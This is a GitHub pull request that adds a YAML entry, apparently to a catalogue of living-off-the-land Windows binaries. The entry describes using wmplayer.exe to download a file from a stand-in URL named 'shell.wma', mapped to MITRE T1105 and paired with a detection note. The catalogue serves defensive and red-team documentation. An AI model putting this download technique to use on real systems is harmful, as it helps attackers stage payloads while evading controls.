Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Added technique using wmplayer.exe #414

Open
wants to merge 3 commits into
base: master
Choose a base branch
from
Open
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
27 changes: 27 additions & 0 deletions yml/OSBinaries/Wmplayer.yml
Original file line number Diff line number Diff line change
@@ -0,0 +1,27 @@
---
Name: Wmplayer.exe
Description: Windows Media Player
Author: 'Rutger Flohil'
Created: 2024-12-14
Commands:
- Command: wmplayer.exe "http://example.com/shell.wma"
Description: Windows Media Player will download the file and attempt to play it. File should be encoded and have a compatible extension like wma. Download is stored in INetCache and needs to be cleaned before use.
Usecase: Download file from the internet
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows 10, Windows 11
Tags:
- Download: INetCache
Full_Path:
- Path: C:\Program Files\Windows Media Player\wmplayer.exe
- Path: C:\Program Files (x86)\Windows Media Player\wmplayer.exe
Code_Sample:
- Code: https://pampuna.nl/blog/2024/12/wmplayer.html
Detection:
- IOC: Network connections originating from wmplayer.exe may be suspicious
Resources:
- Link: https://pampuna.nl/blog/2024/12/wmplayer.html
Acknowledgement:
- Person: Rutger Flohil
Handle: ''
Loading